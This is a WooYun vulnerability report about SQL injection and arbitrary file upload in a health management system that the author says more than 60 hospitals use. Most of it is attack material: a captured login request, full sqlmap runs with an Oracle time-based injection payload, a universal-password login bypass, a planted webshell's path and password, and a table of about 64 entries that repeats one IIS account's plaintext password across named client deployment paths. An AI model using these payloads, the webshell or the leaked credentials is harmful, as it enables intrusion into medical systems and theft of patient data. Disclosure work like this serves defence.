当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153162

漏洞标题:杭州希和健康管理系统sql注入/任意文件上传

相关厂商:杭州希和信息技术有限公司

漏洞作者: 金馆长

提交时间:2015-11-10 10:09

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

123

详细说明:

9.png

POST /Login.aspx?type=login HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://**.**.**.**/
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 245
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: r00ts blackdoor=2e9ccbb5152d65f93f1e5e440eed2c55; userID=1; organId=1; userName=%u7CFB%u7EDF%u7BA1%u7406%u5458; scope=1
__VIEWSTATE=%2FwEPDwUKMTc0NzA0NzYzMmRkA71oe9P3edLMZIEXCbE%2FN3sK4qFhAGwsmU0fDuEzsZQ%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWAwL4o567DAKl1bKzCQKd%2B7qdDhkCqP40W2j8%2BpKD7BoM8144v0eIiAiIaRrGOyk6wCwI&txtUserName=admin&txtPwd=123456
POST注入

C:\Python27\sqlmapproject-sqlmap-c31e23e>sqlmap.py -r 1.txt -p txtPwd
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151107}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:14:46
[21:14:46] [INFO] parsing HTTP request from '1.txt'
[21:14:46] [INFO] testing connection to the target URL
[21:14:46] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[21:14:47] [INFO] testing if the target URL is stable
[21:14:47] [INFO] target URL is stable
[21:14:48] [WARNING] heuristic (basic) test shows that POST parameter 'txtPwd' m
ight not be injectable
[21:14:48] [INFO] testing for SQL injection on POST parameter 'txtPwd'
[21:14:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:14:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:14:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[21:14:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:14:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[21:14:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[21:14:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:14:54] [INFO] testing 'MySQL inline queries'
[21:14:54] [INFO] testing 'PostgreSQL inline queries'
[21:14:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[21:14:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:14:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:14:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[21:14:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[21:14:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:14:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:15:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:15:02] [INFO] testing 'Oracle AND time-based blind'
[21:15:12] [INFO] POST parameter 'txtPwd' seems to be 'Oracle AND time-based bli
nd' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s
pecific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Oracle' extending
provided level (1) and risk (1) values? [Y/n] 1
[21:15:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:15:51] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[21:15:53] [INFO] target URL appears to be UNION injectable with 16 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[21:16:33] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. '--dbms=mysql')
[21:16:33] [INFO] checking if the injection point on POST parameter 'txtPwd' is
a false positive
POST parameter 'txtPwd' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N]
sqlmap identified the following injection point(s) with a total of 243 HTTP(s) r
equests:
---
Parameter: txtPwd (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTc0NzA0NzYzMmRkA71oe9P3edLMZIEXCbE/N3sK4qFhAGw
smU0fDuEzsZQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWAwL4o567DAKl1b
KzCQKd+7qdDhkCqP40W2j8+pKD7BoM8144v0eIiAiIaRrGOyk6wCwI&txtUserName=admin&txtPwd=
123456' AND 6492=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(80)||CHR(76)||CHR(110),5
) AND 'uRTa'='uRTa
---
[21:17:43] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[21:17:43] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'


10.png


C:\Python27\sqlmapproject-sqlmap-c31e23e>sqlmap.py -r 1.txt -p txtPwd --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151107}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:17:56
[21:17:56] [INFO] parsing HTTP request from '1.txt'
[21:17:56] [INFO] resuming back-end DBMS 'oracle'
[21:17:56] [INFO] testing connection to the target URL
[21:17:56] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtPwd (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTc0NzA0NzYzMmRkA71oe9P3edLMZIEXCbE/N3sK4qFhAGw
smU0fDuEzsZQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWAwL4o567DAKl1b
KzCQKd+7qdDhkCqP40W2j8+pKD7BoM8144v0eIiAiIaRrGOyk6wCwI&txtUserName=admin&txtPwd=
123456' AND 6492=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(80)||CHR(76)||CHR(110),5
) AND 'uRTa'='uRTa
---
[21:17:56] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[21:17:56] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:17:56] [INFO] fetching database (schema) names
[21:17:56] [INFO] fetching number of databases
[21:17:57] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[21:18:28] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[21:18:29] [INFO] adjusting time delay to 1 second due to good response times
[21:18:30] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[21:18:30] [ERROR] unable to retrieve the number of databases
[21:18:30] [INFO] falling back to current database
[21:18:30] [INFO] fetching current database
[21:18:30] [INFO] retrieved: HM2_QUANZHOU_D
[21:19:50] [ERROR] invalid character detected. retrying..
[21:19:50] [WARNING] increasing time delay to 2 seconds
UOJIGOU
[21:20:40] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
available databases [1]:
[*] HM2_QUANZHOU_DUOJIGOU
[21:20:40] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 21:20:40


1.png


后台万能密码可登陆 admin' or 'a'='a 123456

4.png

登陆后点基本信息随便找个人添加附近 可上传任何文件

5.png


Getshell http://**.**.**.**/AccessPath/ClientAnnex/201511091931565390193.aspx 密码 gztest

6.png


有60多医院在用这个系统

ID IIS_USER IIS_PASS Domain Path 
1 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80: c:\inetpub\wwwroot
2 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\多机构180\综合平台
3 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\宁夏博尚健康体检院\微信
4 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\深圳康美乐\问卷
5 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北襄阳\综合平台
6 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\辽宁电力\微信服务号
7 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\WebService
8 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\浙江瑞生(紫荆生物)APP\healthapp\healthapp
9 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\深圳康美乐\个人空间
10 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\深圳康美乐\综合平台
11 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北应城\部署文件\综合平台
12 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北襄阳\个人空间
13 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\微信
14 IUSR_AY120822061755Z I/2{6&J+v`i.3x :1133: D:\客户应用\多机构180\测试180平台
15 IUSR_AY120822061755Z I/2{6&J+v`i.3x :4417: D:\客户应用\陕西森工医院\Web服务
16 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\healthapp
17 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北应城\部署文件\个人空间
18 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\WebService
19 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\辽宁电力\问卷
20 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\webservice
21 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北应城\部署文件\问卷
22 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\江西泽众\WebService
23 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北应城\部署文件\WebService
24 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\深圳康美乐\WebService
25 IUSR_AY120822061755Z I/2{6&J+v`i.3x :8815: D:\客户应用\宁夏博尚健康体检院\综合平台
26 IUSR_AY120822061755Z I/2{6&J+v`i.3x :8818: D:\客户应用\宁夏博尚健康体检院\个人空间
27 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\微信
28 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\多机构180\个人空间
29 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\多机构180\WebService
30 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\多机构180\180微信
31 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\辽宁电力\healthapp
32 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\内蒙古健康管理学会门诊部\web服务
33 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\IOSAPP
34 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\辽宁电力\综合平台
35 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\内蒙古健康管理学会门诊部\healthapp
36 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\综合平台
37 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\综合平台
38 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\个人空间
39 IUSR_AY120822061755Z I/2{6&J+v`i.3x :8817: D:\客户应用\宁夏博尚健康体检院\WebService
40 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\微信
41 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\个人空间
42 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北松滋\bs问卷
43 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\深圳康美乐\微信
44 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\微信
45 IUSR_AY120822061755Z I/2{6&J+v`i.3x :4415: D:\客户应用\陕西森工医院\平台
46 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\综合平台
47 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\bs问卷
48 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\希禾公司项目\产品部专用\2.0个人空间
49 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\希禾公司项目\产品部专用\2.0综合平台
50 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\陕西森工医院\个人空间
51 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\内蒙古健康管理学会门诊部\个人空间
52 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\江西泽众\个人空间
53 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\江西泽众\综合平台
54 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北襄阳\襄阳市第一人民医院微信
55 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北襄阳\webservice
56 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\个人空间
57 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\内蒙古健康管理学会门诊部\问卷
58 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:yakIOS.**.**.**.** D:\客户应用\成都亿安康健康管理有限公司\healthapp
59 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北襄阳\bs问卷
60 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:lndlspace.**.**.**.** D:\客户应用\辽宁电力\个人空间
61 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\内蒙古健康管理学会门诊部\综合平台
62 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\东方疗养院(为城)\综合平台0624
63 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:**.**.**.** D:\客户应用\湖北浠水\部署文件\2.0新版BS问卷
64 IUSR_AY120822061755Z I/2{6&J+v`i.3x :80:lndlweb.**.**.**.** D:\客户应用\辽宁电力\WebService


5.png

内部信息一览无遗

漏洞证明:

http://**.**.**.**/AccessPath/ClientAnnex/201511091931565390193.aspx 密码 gztest

C:\Python27\sqlmapproject-sqlmap-c31e23e>sqlmap.py -r 1.txt -p txtPwd --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151107}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:17:56
[21:17:56] [INFO] parsing HTTP request from '1.txt'
[21:17:56] [INFO] resuming back-end DBMS 'oracle'
[21:17:56] [INFO] testing connection to the target URL
[21:17:56] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtPwd (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTc0NzA0NzYzMmRkA71oe9P3edLMZIEXCbE/N3sK4qFhAGw
smU0fDuEzsZQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWAwL4o567DAKl1b
KzCQKd+7qdDhkCqP40W2j8+pKD7BoM8144v0eIiAiIaRrGOyk6wCwI&txtUserName=admin&txtPwd=
123456' AND 6492=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(80)||CHR(76)||CHR(110),5
) AND 'uRTa'='uRTa
---
[21:17:56] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[21:17:56] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:17:56] [INFO] fetching database (schema) names
[21:17:56] [INFO] fetching number of databases
[21:17:57] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[21:18:28] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[21:18:29] [INFO] adjusting time delay to 1 second due to good response times
[21:18:30] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[21:18:30] [ERROR] unable to retrieve the number of databases
[21:18:30] [INFO] falling back to current database
[21:18:30] [INFO] fetching current database
[21:18:30] [INFO] retrieved: HM2_QUANZHOU_D
[21:19:50] [ERROR] invalid character detected. retrying..
[21:19:50] [WARNING] increasing time delay to 2 seconds
UOJIGOU
[21:20:40] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
available databases [1]:
[*] HM2_QUANZHOU_DUOJIGOU
[21:20:40] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 21:20:40


2.png


修复方案:

你们更专业

版权声明:转载请注明来源 金馆长@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-20 16:10

厂商回复:

CNVD未复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无